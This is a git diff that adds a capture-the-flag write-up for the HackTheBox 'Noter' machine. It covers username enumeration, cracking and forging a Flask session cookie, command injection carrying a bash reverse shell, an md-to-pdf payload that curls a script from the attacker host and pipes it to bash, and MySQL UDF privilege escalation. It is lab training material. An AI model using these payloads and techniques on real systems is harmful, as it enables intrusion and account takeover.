diff --git a/HackTheBox/Noter.md b/HackTheBox/Noter.md
new file mode 100644
index 0000000..858f6c6
--- /dev/null
+++ b/HackTheBox/Noter.md
@@ -0,0 +1,265 @@
+# HackTheBox - Noter
+
+## NMAP
+
+```bash
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.3
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
+| http-methods:
+|_ Supported Methods: OPTIONS HEAD GET
+|_http-title: Noter
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+## PORT 21 (FTP)
+
+Tried anonymous login on ftp which failed, so moving on to port 5000
+
+
+
+## PORT 5000 (HTTP)
+
+
+
+On this page we can see an option to see notes but this required a authorized user, I tried to use default admin password `admin:admin` which didn't worked. Also tried doing a basic sqli `admin' or 1=1 -- ` which failed too
+
+
+
+We do have an option to register an account so let's do that
+
+
+
+After logging in we can add notes and also there's an option for upgrading to VIP
+
+
+
+But this option wasn't available
+
+
+
+So moving on to adding notes, I tried testing for xss which failed
+
+
+
+
+
+Checking the session cookie, it was a flask session as it can be decoded using `flask-unsign` which tells that it's a flask application
+
+
+
+
+
+Maybe there's SSTI in notes, we can check that too because most of the flask apps are vulnerable to SSTI
+
+
+
+
+
+This didn't worked as well, so I went with fuzzing for files and directories using `dirsearch`
+
+
+
+## Foothold
+
+There wasn't really interesting, looking back at the flask session maybe we can modify it to get a user's session but for that there are two things we need a valid username which should have admin privileges or should get us somewhere and a flask secret with which we can forge flask session
+
+We can fuzz for usernames and to do that we need to do some filtering with the responses
+
+
+
+For the existing username we get an error message "Invalid login"
+
+
+
+And for a user which doesn't exist we get "Invalid credentials" so with the help of error messages we can do user enumeration
+
+
+
+Let's first identifiy POST parameters
+
+
+
+I added `ARZ` which is a valid user and `admin` which doesn't exist and looking at the response of characters we can try to filter for characters below `2030` which might give us a username
+
+```bash
+wfuzz -c -w /opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt -u 'http://10.10.11.16
+0:5000/login' -d 'username=FUZZ&password=1' --hh 2029,2030,2031,2032,2033,2034,2035,2036
+```
+
+
+So it started to show me responses with less characters but still I wasn't sure of which ones could be a username so this method isn't effective even tho we can see a username `blue` with the same exact characters so this might be the username we are looking but we can do this effectively with a tool called `patator`
+
+https://github.com/lanjelot/patator
+
+```bash
+python3 patator.py http_fuzz 'url=http://10.10.11.160:5000/login' method=POST body='username=FILE0&password=a' 0=/opt/SecLists/Usernames/xato-net-10-million-usernames-dup.txt -x ignore:fgrep='Invalid credentials'
+```
+The syntax is a little harder but it's an awesome tool to fuzz with error messages
+
+
+
+Which gives the same user `blue` and if check on the login page to see if this user exists
+
+
+
+We get the message "Invalid login", now we just need the secret in order to modify the flask session
+
+
+
+https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask
+
+Visitng hacktricks, we can brute force secret with flask-unsign
+
+
+
+Using `rockyou.txt` to brute force secret didn't work so I had to install the wordlist for flask secret
+
+
+
+```bash
+flask-unsign --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiQVJaIn0.Ynkvhw.C69zkNUyfYjmYN0e08l6EmWAh1U'
+```
+
+
+And we got the secret which is `secret123`, now we need to sign in having the username `blue`
+
+```bash
+flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
+```
+
+
+
+After replacing the flask session we'll be able to login as blue
+
+
+
+And in notes we'll be able to a password for ftp user `blue : blue@Noter!`
+
+
+
+
+
+Reading the pdf file, we'll get another password `username@site_name!` so this must be for the `ftp_admin` which would be `ftp_admin@Noter!`
+
+
+
+Downloading these backup archives, we get two versions of the source code, the one from the backup `1638395546` is having the source code for exporting notes
+
+## Un-Intended Method
+
+
+
+And it's running a command to run a node js module passing the contents of makrdown file to convert it to pdf which is then executing a shell command with `subprocess.run` which is vulnerable to command injection
+
+I created a markdown file having a bash reverse shell, now let's try importing it
+
+
+
+
+
+After exporting the makrdown file we'll get this error but at our netcat listener we'll get a connection but it will just close after connecting
+
+
+
+To escapae the single quote from `$'{r.text.strip()}'` we need to use `'` before our reverse shell and use either pipe `|` or semicolon `;` to execute the reverse shell command at the end we'll specify `#`
+
+```bash
+' ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.51/2222 0>&1' #
+
+```
+
+
+
+Stabilizing the shell with python3
+
+
+
+I didn't find any thing in user's directory or having seeing anything with `sudo -l` so transferred `pspy` to monitor background processes
+
+
+
+We can also see how that single quote escape worked
+
+
+
+## Intended Method
+From the node command being executed, it's a module called `md-to-pdf`
+
+
+
+
+
+This was vulnerable to rce
+
+
+
+https://github.com/simonhaenisch/md-to-pdf/issues/99
+
+```
+---js\n((require("child_process")).execSync("curl 10.10.16.51:3333/shell.sh | bash"))\n---RCE
+
+```
+
+This payload will download our bash reverse shell and execute by piping it to bash
+
+
+
+From the backup of `1635803546` archive, we previously found credentials for mysql so let's test if these work
+
+
+
+
+## Privilege Escalation
+
+Here we can do something which is called `Privilege Escalation with MySQL User Defined Functions`
+
+https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
+
+https://www.exploit-db.com/exploits/1518
+
+First we need to compile the source code
+
+
+
+Now to create a shared library
+
+
+
+After this we need to locate where the plugins are stroed and create a table in `mysql` database which will have an entry for the exploit which will help us in loading it in mysql plugins, create a user defined function which will run system commands using that shared library
+
+
+
+Plugins directory is `/usr/lib/x86_64-linux-gnu/mariadb19/plugin/`
+
+Switching to mysql database
+
+
+
+Creating a table named `foo` and inserting the shared library
+
+
+
+
+
+From the table, loading the plugin
+
+
+
+Creating the function `do_system`
+
+
+
+And now just using the function to get a reverse shell
+
+
+
+## References
+- https://github.com/lanjelot/patator
+- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask
+- https://pypi.org/project/flask-unsign-wordlist/
+- https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
+- https://www.exploit-db.com/exploits/50236
+
+